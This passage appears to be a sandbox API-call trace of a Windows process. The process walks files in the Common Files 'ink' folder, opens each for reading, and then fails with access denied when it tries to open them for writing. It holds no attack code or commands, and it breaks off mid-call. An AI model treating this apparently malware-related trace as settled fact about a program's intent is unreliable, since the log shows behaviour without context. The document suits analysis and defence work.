0x8a368 [0084.469] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60348 | out: hHeap=0x20000) returned 1 [0084.469] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.469] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.469] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.469] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.469] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a368 | out: hHeap=0x20000) returned 1 [0084.469] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0084.469] AreFileApisANSI () returned 1 [0084.469] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\IPSEventLogMsg.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\IPSEventLogMsg.dll", lpUsedDefaultChar=0x0) returned 70 [0084.469] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6dc60 [0084.469] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.469] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.469] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0084.469] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0084.470] AreFileApisANSI () returned 1 [0084.470] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6dc60, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 70 [0084.470] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8c) returned 0x8ab20 [0084.470] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6dc60, cbMultiByte=-1, lpWideCharStr=0x8ab20, cchWideChar=70 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\IPSEventLogMsg.dll") returned 70 [0084.470] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\IPSEventLogMsg.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipseventlogmsg.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x364 [0084.592] GetFileType (hFile=0x364) returned 0x1 [0084.592] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ab20 | out: hHeap=0x20000) returned 1 [0084.592] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0084.592] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0084.593] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0084.593] CloseHandle (hObject=0x364) returned 1 [0084.593] AreFileApisANSI () returned 1 [0084.593] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6dc60, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 70 [0084.593] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8c) returned 0x8aa88 [0084.593] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6dc60, cbMultiByte=-1, lpWideCharStr=0x8aa88, cchWideChar=70 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\IPSEventLogMsg.dll") returned 70 [0084.593] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\IPSEventLogMsg.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipseventlogmsg.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.593] GetLastError () returned 0x5 [0084.593] GetLastError () returned 0x5 [0084.593] SetLastError (dwErrCode=0x5) [0084.593] GetLastError () returned 0x5 [0084.593] SetLastError (dwErrCode=0x5) [0084.593] GetLastError () returned 0x5 [0084.593] SetLastError (dwErrCode=0x5) [0084.593] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aa88 | out: hHeap=0x20000) returned 1 [0084.593] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0084.593] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0084.594] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6dc60 | out: hHeap=0x20000) returned 1 [0084.594] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.594] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.594] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d100bae, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x7d100bae, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x7d126e12, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xa62, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="ipsfin.xml", cAlternateFileName="")) returned 1 [0084.594] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0084.594] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0084.594] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0084.594] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0084.594] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0084.594] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0084.594] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0084.594] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0084.594] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0084.594] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0084.594] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0084.594] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0084.594] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0084.594] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0084.594] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0084.594] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0084.594] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0084.594] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0084.594] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0084.594] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60088 [0084.594] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0084.594] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0084.594] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6df20 [0084.594] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60088 | out: hHeap=0x20000) returned 1 [0084.594] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.594] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.594] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.594] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.594] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6df20 | out: hHeap=0x20000) returned 1 [0084.594] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0084.594] AreFileApisANSI () returned 1 [0084.595] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsfin.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsfin.xml", lpUsedDefaultChar=0x0) returned 62 [0084.595] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0084.595] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.595] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.595] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0084.595] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0084.595] AreFileApisANSI () returned 1 [0084.595] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0084.595] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6df20 [0084.595] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x6df20, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsfin.xml") returned 62 [0084.595] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsfin.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsfin.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x364 [0084.595] GetFileType (hFile=0x364) returned 0x1 [0084.595] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6df20 | out: hHeap=0x20000) returned 1 [0084.595] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0084.595] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0084.596] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0084.596] CloseHandle (hObject=0x364) returned 1 [0084.596] AreFileApisANSI () returned 1 [0084.596] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0084.596] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6e030 [0084.596] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x6e030, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsfin.xml") returned 62 [0084.596] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsfin.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsfin.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.596] GetLastError () returned 0x5 [0084.596] GetLastError () returned 0x5 [0084.596] SetLastError (dwErrCode=0x5) [0084.596] GetLastError () returned 0x5 [0084.596] SetLastError (dwErrCode=0x5) [0084.596] GetLastError () returned 0x5 [0084.596] SetLastError (dwErrCode=0x5) [0084.596] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e030 | out: hHeap=0x20000) returned 1 [0084.596] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0084.596] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0084.597] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0084.597] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.597] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.597] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c940eb6, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x7c940eb6, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x7c940eb6, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xa44, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="ipsfra.xml", cAlternateFileName="")) returned 1 [0084.597] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0084.597] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0084.597] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0084.597] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0084.597] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0084.597] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0084.597] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0084.597] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0084.597] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0084.597] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0084.597] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0084.597] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0084.597] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0084.597] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0084.597] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0084.597] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0084.597] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0084.597] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0084.597] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0084.597] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f428 [0084.597] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0084.597] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0084.597] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e4f8 [0084.597] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f428 | out: hHeap=0x20000) returned 1 [0084.597] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.597] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.597] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.597] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.597] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e4f8 | out: hHeap=0x20000) returned 1 [0084.597] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0084.597] AreFileApisANSI () returned 1 [0084.597] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsfra.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsfra.xml", lpUsedDefaultChar=0x0) returned 62 [0084.597] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0084.598] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.598] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.598] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0084.598] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0084.598] AreFileApisANSI () returned 1 [0084.598] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0084.598] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6ea48 [0084.598] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x6ea48, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsfra.xml") returned 62 [0084.598] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsfra.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsfra.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x364 [0084.598] GetFileType (hFile=0x364) returned 0x1 [0084.598] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0084.598] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0084.599] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0084.599] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0084.599] CloseHandle (hObject=0x364) returned 1 [0084.599] AreFileApisANSI () returned 1 [0084.599] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0084.599] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6e608 [0084.599] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x6e608, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsfra.xml") returned 62 [0084.599] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsfra.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsfra.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.599] GetLastError () returned 0x5 [0084.599] GetLastError () returned 0x5 [0084.599] SetLastError (dwErrCode=0x5) [0084.599] GetLastError () returned 0x5 [0084.599] SetLastError (dwErrCode=0x5) [0084.599] GetLastError () returned 0x5 [0084.599] SetLastError (dwErrCode=0x5) [0084.599] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e608 | out: hHeap=0x20000) returned 1 [0084.600] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0084.600] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0084.600] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0084.600] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.600] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.600] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d126e12, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x7d126e12, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x7d126e12, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x9e4, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="ipshe.xml", cAlternateFileName="")) returned 1 [0084.600] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0084.600] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0084.600] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0084.600] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0084.600] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0084.600] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0084.600] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0084.600] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0084.600] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0084.600] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0084.600] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0084.600] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0084.600] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0084.600] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0084.600] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0084.600] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0084.600] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0084.600] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0084.600] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0084.600] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f798 [0084.600] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0084.600] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0084.600] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ebe0 [0084.600] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f798 | out: hHeap=0x20000) returned 1 [0084.600] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.600] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, 